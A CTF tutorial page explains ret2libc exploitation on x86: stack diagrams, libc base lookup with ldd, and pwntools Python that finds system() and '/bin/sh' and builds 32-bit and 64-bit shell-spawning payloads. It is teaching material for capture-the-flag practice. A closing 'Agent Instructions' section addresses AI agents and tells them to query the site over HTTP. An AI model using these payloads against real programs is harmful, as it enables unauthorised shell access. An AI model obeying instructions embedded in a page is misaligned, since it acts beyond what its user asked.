# Ret2LibC

Ret2libc, short for "return-to-libc," is a type of attack that allows an attacker to execute arbitrary code in a program by redirecting the program's execution flow to a function in the libc shared library.

## How it works ?

The main idea is to make a simulate a valid call to the system() function by arranging the stack correctly so that the system() function launches a shell.

{% hint style="warning" %}
The execution of this technique may vary depending on the instruction set architecture and the calling convention used. In this article, the x86 standard calling convention will be used as an example.
{% endhint %}

As explained [here](/pwn/general-knowledge/operation-of-the-stack.md#prologue), A valid`system()` call will push the address of the parameter onto the stack followed by the return address ( saved EIP ) :

```
  address   |   values
------------+-------------------------------------------------------------------
            |   +---------------------- stack frame -------------------------+
            |   | +-saved eip -+ +-- param ---+                              |
0xffffd274: |   | | 0x565561dd | | 0xffffd35c |	0x00000002	0x00000001   |
            |   | +------------+ +------------+                              |
0xffffd284: |   |   0xffffd354	  0xffffd35c	0x00000000	0xffffd2b0   |
0xffffd294: |   |   0xffffd354	  0xffffd35c	0x00000000	0xffffd2b0   |
  ...       |    ...
```

When a function ends and calls the `RET` instruction, it is actually a `POP EIP` that is performed, followed by a `JMP EIP`. The `POP EIP` takes the value that is on top of the stack and stores it in the `EIP` register. Since this value is controled (using a [Buffer overflow](/pwn/stack-exploitation/stack-buffer-overflow/instruction-pointer-overwrite.md) or [format string exploit](/pwn/stack-exploitation/format-string/data-modification.md) for example), the `JMP EIP` is controled.

So, there is the stack state after a buffer overflow in order to return to the `system` function with a valid call :

```
  address   |   values
------------+-------------------------------------------------------------------
            |   +------------------------- Buffer ---------------------------+
0xffffd264: |   |   0x41414141    0x41414141    0x41414141      0x41414141   |
            |   +------------------------------------------------------------+
            |     +system addr-+ +-saved eip -+ +--- param --+               |
0xffffd274: |     | 0x565561dd | | 0xffffd35c |	| 0xffffd12c |	0x00000001   |
            |     +------------+ +------------+ +------------+               |
  ...       |    ...
```

{% hint style="info" %}
Because of the call of `system` the return address (saved EIP) isn't important, so any value can be send here.
{% endhint %}

In order to make the stack in this state, the following payload must be used :

```bash
[buffer overflow needed lenght][system() address][any 4 bytes][parameter address]
```

## Getting `libc` base address

```bash
$ ldd chall
	linux-gate.so.1 (0xf7f64000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7d51000)
	/lib/ld-linux.so.2 (0xf7f66000)
```

{% hint style="warning" %}
If the ASLR is enable, this will not work and the [libc address must be leak.](/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/leaking-libc.md)
{% endhint %}

## Getting the "`/bin/sh`" and "`system()`" addresses

Using pwntools, it's easy to retrieve theses addresses till the libc version and base address are known :

```python
from pwn import *

# Load the binary file and start the process
elf = context.binary = ELF('./chall')
p = process()

# Load the libc library and set its base address
libc = elf.libc                    
libc.address = 0xf7dc2000              

# Get the address of the system function in the libc library
system = libc.sym['system']            

# Search for the '/bin/sh' string in the libc library and get its address
binsh = next(libc.search(b'/bin/sh'))

```

## Payload

```python
# 32-bits
payload = flat(
          b'A' * offset,
          p32(system),
          p32(elf.sym['main']),
          p32(binsh)
          )
          
# 64-bits

payload = flat(
          b'A' * offset,
          p64(POP_RDI_GADGET),
          p64(binsh),
          p64(system),
          p64(elf.sym['main'])
          )
```

## Resources

{% embed url="<https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/ret2libc>" %}

{% embed url="<https://beta.hackndo.com/retour-a-la-libc/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/ret2libc.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.